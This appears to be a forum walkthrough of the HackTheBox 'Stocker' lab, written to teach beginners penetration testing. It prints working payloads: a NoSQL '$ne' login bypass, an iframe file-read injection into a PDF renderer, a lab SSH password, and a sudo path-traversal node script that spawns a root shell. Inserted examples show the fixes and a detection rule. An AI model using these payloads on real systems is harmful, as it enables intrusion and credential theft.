InspectorGadget
HTB Fuzzing NoSQLi-Auth-Bypass Server-side-XSS linux-privesc BurpSuite

HackTheBox Stocker Writeup / Walkthrough [Noob Friendly!]

Posted 01-25-2023, 07:44 PM
[Image: 25aPek2.png]

Box Info:
IP Address: 10.10.11.196
Operating System: Linux
Rating: Easy
Released: 14th January 2023

My Machine Info:
Operating System: Kali Linux 2022.4 - Fresh VMWare Install
User: kali (Default)
Hostname: kali (Default)
HTB VPN (TUN0) IP Address: 10.10.14.178

Opening Statement & Contents Summary:
I'm GismoGuy and this is my first writeup of a HackTheBox machine; this time it's Stocker. The writeup is written with the intention of you following along, but a basic knowledge of Kali Linux is assumed, such as being able to connect to the HackTheBox VPN, join the Stocker machine instance and enter terminal commands. Please leave a comment if you would like me to make a guide on how to do this and would find it helpful.

Here are the summary steps for completing this box. Further below in this post we will go through each step in detail and ultimately find the user.txt and root.txt flags.

  1. Enumeration via nmap and virtual host finding.
  2. NoSQL Injection for Auth Bypass on dev environment web panel.
  3. Server Side XSS to read local files, discovering username and password in files.
  4. Privilege escalation using sudo -l and javascript shell for root.

Enumeration via Nmap:
First, let's perform an Nmap scan across all TCP ports with default scripts and basic version detection. This may take a couple of minutes to complete.
Code
nmap -sC -sV -p- 10.10.11.196

The output should look like this:
[Image: Uoo8YCN.png]

Adding stocker.htb to our hosts file:
Looking at the output screenshot above, I've highlighted a section of the output that tells us that if we visited 10.10.11.196 in a web browser we would be redirected to stocker.htb, so before we can continue we need to add it to our hosts file.
Code
sudo nano /etc/hosts

This will open the nano text editor whilst also opening your hosts file. Here we can add a new entry so our machine knows that stocker.htb is at the 10.10.11.196 IP Address. (Remember, this IP address might be different for you)
Follow along with the screenshot below and then press Control + X, then press the Y key and then press the Enter key.
[Image: R1KaaPQ.png]
This should save the file and take you back to your terminal.

Finding virtual hosts to find the dev environment:
At this point you would usually browse the stocker.htb web page and do further enumeration on the box itself; however, with the magic of breaking the 4th wall, I can tell you the next step is to try and find other virtual hosts. To do this we will be using Gobuster and a built-in wordlist.

If the next command doesn't work because you don't have Gobuster, use the following commands to update your Kali install and then install Gobuster. Make sure to wait for the previous command to finish before doing the next command. Once fully complete, try again!
Code
sudo apt-get update
Code
sudo apt-get upgrade
Code
sudo apt-get dist-upgrade
Code
sudo apt install gobuster


Enter the following command to get Gobuster running:
Code
gobuster vhost -u http://stocker.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt --append-domain

Whilst this is running I'll explain what it is doing. The vhost subcommand tells Gobuster to look for virtual hosts, the -u param tells Gobuster which URL we are targeting, and the -w param is the location of our wordlist. --append-domain means Gobuster will add .stocker.htb to each entry in our wordlist (the virtual host is sent in the Host header of each request, and a different response size from the default host indicates a hit). Breaking the 4th wall again, dev is around 900th in the list and should eventually be picked up by Gobuster; you should then see an output like this.
[Image: nHOqJC9.png]


Adding dev.stocker.htb to our hosts file:
Code
sudo nano /etc/hosts

Since we are not adding a brand-new entry, we just need to add to our previous entry. See the screenshot below for an example. Then press Control + X, then press the Y key and then press the Enter key to save the file and return to your terminal.
[Image: PI2W9ZV.png]

Using BurpSuite to perform NoSQL Injection which bypasses login screen:
Open Burpsuite and set your browser proxy settings to pass through Burp. I personally use the FoxyProxy extension for Firefox to allow me to easily switch between Burp and regular browsing.
If you browse to http://dev.stocker.htb/ you will be redirected to http://dev.stocker.htb/login - this should be enough for you to look at your HTTP history in Burp to view the requests related to the /login page.
[Image: t4l3thn.png]

Within the server response we see the header X-Powered-By: Express. You could Google this, but I already know Express is a popular Node.js web framework, and Node/Express applications are very commonly paired with MongoDB, which means the backend database is likely NoSQL. That means we can attempt a NoSQL injection to perform an authentication bypass.

If you'd like to learn more about this, follow this link or ask for help here at HackForums! http://0xma.com/hacking/nosql_authentica...ypass.html

In this post I'll just describe the steps for completing the NoSQL injection, rather than explaining why it works.
Next, we need to modify an authentication request to the web server: turn on Intercept within your Burp Proxy, then enter random text in the username and password text areas and press Sign In.

Burp should intercept the request as shown below. We then need to change the Content-Type to JSON and rewrite the request body as JSON that includes our NoSQLi auth bypass. In the screenshot below I have highlighted the areas you should pay attention to and change accordingly.
[Image: rwjUS7H.png]
To confirm: the Content-Type header needs to be changed to application/json and the body at the bottom needs changing to the text below. You can then press the Forward button and the web server should redirect you to http://dev.stocker.htb/stock
Code
{ "username": {"$ne": "secret"},
"password": {"$ne": "secret"} }

The basics here are that $ne is MongoDB's "not equal" operator, so instead of matching an exact username and password we told the database to find any user whose username is not 'secret' and whose password is not 'secret'. The first matching user document is returned and the server logs us in as that user.
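To show why the JSON body above logs us in, and what a fix looks like, here is an added example that is not code from the original post or from the Stocker box. It models an Express login handler that passes the parsed request body straight into findOne() against an in-memory "collection" (the user records, the "$ne" matcher and the function names are all constructed for this demo), beside a hardened handler that insists both credentials are plain strings before they reach the query.

```javascript
// Added example (not from the original post): a minimal in-memory model of how
// an Express/Mongoose login handler that passes req.body straight into
// findOne() is bypassed by {"$ne": "secret"}, and how type-checking stops it.
// The user records below are constructed sample data, not the box's users.

const users = [
  { username: "admin", password: "hunter2" },        // constructed sample record
  { username: "angoose", password: "not-the-real-one" },
];

// Tiny subset of MongoDB query matching: a plain value is an equality test,
// an object of the form {"$ne": v} matches when the field is NOT equal to v.
function fieldMatches(actual, expected) {
  if (expected !== null && typeof expected === "object") {
    if ("$ne" in expected) return actual !== expected.$ne;
    throw new Error("operator not supported in this demo");
  }
  return actual === expected;
}

// Returns the first document whose fields all satisfy the query, like findOne().
function findOne(collection, query) {
  return collection.find(doc =>
    Object.keys(query).every(k => fieldMatches(doc[k], query[k]))) || null;
}

// Vulnerable handler: whatever JSON the client sent becomes the query, so a
// nested object with an operator key is interpreted by the database.
function vulnerableLogin(body) {
  const user = findOne(users, { username: body.username, password: body.password });
  return user ? user.username : null;
}

// Hardened handler: credentials must be plain strings before they reach the
// query, so a JSON object such as {"$ne": "secret"} is rejected outright.
function hardenedLogin(body) {
  if (typeof body.username !== "string" || typeof body.password !== "string") {
    return null; // in a real app: respond 400 Bad Request and log the attempt
  }
  const user = findOne(users, { username: body.username, password: body.password });
  return user ? user.username : null;
}

// The payload from the writeup, as express.json() would parse it.
const bypassPayload = { username: { $ne: "secret" }, password: { $ne: "secret" } };
```

vulnerableLogin(bypassPayload) returns "admin" (the first document that is not 'secret'/'secret'), while hardenedLogin(bypassPayload) returns null and only a correct string pair logs in. This is also why the Content-Type had to be switched to application/json in Burp: a JSON body lets the nested {"$ne": ...} object arrive intact at the query. Real applications should additionally store password hashes rather than comparing plaintext in the query, and a schema validator or a sanitiser that strips keys beginning with "$" gives the same protection across every endpoint rather than one handler.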

Checking functionality of the /stock webpage:
Turn off intercept on your Burp Proxy and have a browse around the website, you can add various items to basket and then finally view your cart. If you don't see the items, you may need to fully switch off your browser proxy settings and refresh. Then add an item to the basket and then click View Cart. When the next page loads, you can change your proxy settings back to Burp.

Server Side XSS via PDF Rendering:
Click Submit Purchase and the order is sent successfully; the web server provides us with a PDF copy of our order details, along with the order reference number and a link to view the PDF it generated. This tells us how to access other PDFs we generate later. The URL format is http://dev.stocker.htb/api/po/PDF-ID-HERE
[Image: uqRaDIa.png]

Select new items, add them to basket and then view cart again. Turn on your Burp Proxy Intercept and then click Submit Purchase.
Burp should show the intercepted request, click the Action button and then click Forward to Repeater. Then click the Repeater tab at the top of Burp. This lets you send repeated requests without affecting your web browser.
[Image: Xqkcpfl.png]

As you can see, we are about to send over various details about our order.

We can use a Server Side XSS to modify the contents of the PDF file and ultimately read files from the web server.
More information on this attack can be found here: https://book.hacktricks.xyz/pentesting-w...ynamic-pdf

[Image: t6Jmb4I.png]

As you can see above, we have modified the title data to include our payload within a 900x900 iframe. The payload will cause the PDF Render to grab the contents of the /etc/passwd file and put it into the iframe within the title area of the PDF. On the right hand side you can see the server responds with a success message and the ID of the PDF file that is generated.

The full JSON formatted data string you will need is:
Code
{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"<iframe width=900 height=900 src=file:///etc/passwd></iframe>","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}

If we then visit http://dev.stocker.htb/api/po/ORDER-ID-HERE (in my case it's http://dev.stocker.htb/api/po/63cdaa4fd3cbc8b43c3215c7) we will see the contents of the /etc/passwd file. Take note of the user called angoose towards the bottom. That's our SSH username!
[Image: XFRcelu.png]
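To make the server-side XSS concrete from the fixing side, here is an added example that is not code from the original post or from the Stocker box. It models the order-to-PDF step: the vulnerable render drops the basket title straight into the HTML that the PDF renderer converts (so the iframe in the writeup's payload is rendered and the renderer fetches the local file), while the hardened render HTML-escapes every client-supplied field first. The function names and the benign second item are constructed for the demo; the first item's fields come from the writeup's JSON payload.

```javascript
// Added example (not from the original post): the vulnerable and the hardened
// way to build the order HTML that gets handed to a PDF renderer.

// Basket item as sent in the writeup's payload (title contains the iframe).
const payloadItem = {
  title: "<iframe width=900 height=900 src=file:///etc/passwd></iframe>",
  description: "It's an axe.",
  price: 12,
  amount: 1,
};

// Constructed benign item for comparison.
const benignItem = { title: "Axe", description: "It's an axe.", price: 12, amount: 1 };

// Vulnerable: plain string interpolation, nothing is encoded. Any HTML in
// the title becomes part of the document the renderer loads.
function renderOrderHtmlVulnerable(items) {
  return items.map(i =>
    `<tr><td>${i.title}</td><td>${i.description}</td>` +
    `<td>${i.amount} x ${i.price}</td></tr>`
  ).join("\n");
}

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, c => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened: every client-supplied field is escaped before it reaches the
// template, so the iframe tag is displayed as literal text in the PDF.
function renderOrderHtmlHardened(items) {
  return items.map(i =>
    `<tr><td>${escapeHtml(i.title)}</td><td>${escapeHtml(i.description)}</td>` +
    `<td>${escapeHtml(i.amount)} x ${escapeHtml(i.price)}</td></tr>`
  ).join("\n");
}

// Detection on the raw order data (not the rendered HTML): product names
// never legitimately contain tags or file:// URLs, so flag such orders for
// review. Useful as a log rule even once the template is fixed.
function looksLikeRenderInjection(item) {
  const fields = [item.title, item.description].map(String);
  return fields.some(f => /<\s*\w+/.test(f) || /file:\/\//i.test(f));
}
```

Escaping fixes the template, but the renderer itself should also be denied local file access and outbound network (for example wkhtmltopdf's --disable-local-file-access option, or running the headless browser in a sandboxed container with no access to the web root), so that a missed encoding somewhere else in the template does not again turn into file read. Note that the hardened output still contains the text "file:///etc/passwd", just inert, which is why the detection rule above inspects the submitted order fields rather than the rendered HTML.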

Next we need to repeat this order process (see, glad we are in the Repeater tab in Burp now!) but change the payload to read a more useful file. It's hit and miss where to look, but config files and the source code of the running web application are always a good idea. /var/www/ is the default web server directory, and we are on the dev virtual host, so /var/www/dev seems like a good place to look. We know the web server is Express and ultimately Node.js, so the running web service is likely /var/www/dev/index.js.

Let's change our payload to read the contents of this file and see!
Code
{"basket":[{"_id":"638f116eeb060210cbd83a91","title":"<iframe width=900 height=900 src=file:///var/www/dev/index.js></iframe>","description":"It's an axe.","image":"axe.jpg","price":12,"currentStock":21,"__v":0,"amount":1}]}

Your PDF should now look like this. I've highlighted the MongoDB connection string, which contains a password we can try re-using to SSH into the box and obtain the user flag.
[Image: Coufe5i.png]

SSH as angoose and obtain user.txt flag:
Use the following command to open a SSH session to the machine as the angoose user.
Code
ssh angoose@10.10.11.196
When asked for the password, copy and paste the following.
Code
IHeardPassphrasesArePrettySecure
[Image: C6H35BD.png]
Then grab the user.txt flag with the following and submit to HTB.
Code
cat user.txt

Privilege Escalation to Root:
By using the below command, we can check if we have permissions to do anything as root.
Code
sudo -l
[Image: XyhpGsk.png]

The above output shows that node can be run as root, provided the JavaScript file it is given comes from the /usr/local/scripts directory (the sudoers rule is a wildcard on /usr/local/scripts/*.js).
We can create a malicious JavaScript file that spawns a shell; because node runs via sudo, that shell will have root permissions.

Use the following to create a new .js file called rootme within the home directory of Angoose.
Code
nano /home/angoose/rootme.js

Now paste the following into the file and press Control + X and then Y and then Enter to save the document.
Code
// Spawn bash with node's stdin/stdout/stderr attached; node is running as root via sudo, so the shell is root too.
const shell = require("child_process").spawn("/usr/bin/bash", {stdio: [0, 1, 2]})

Finally we are going to run Node as root (via sudo) and abuse directory traversal: sudo matches the wildcard against the command-line text, so a path that starts with /usr/local/scripts/ and ends in .js passes the rule even though the ../ segments make it resolve to our rootme script outside the /usr/local/scripts folder.
Code
sudo /usr/bin/node /usr/local/scripts/../../../../home/angoose/rootme.js
[Image: 03PrC2N.png]

As you can see above, you now have a root shell and can read the root.txt flag!
05-17-2023, 03:13 PM
This is very noob friendly for me, I'm going to try it later on. Thanks for the share :)
02-03-2023, 08:13 AM
Great walkthrough. Thanks for sharing.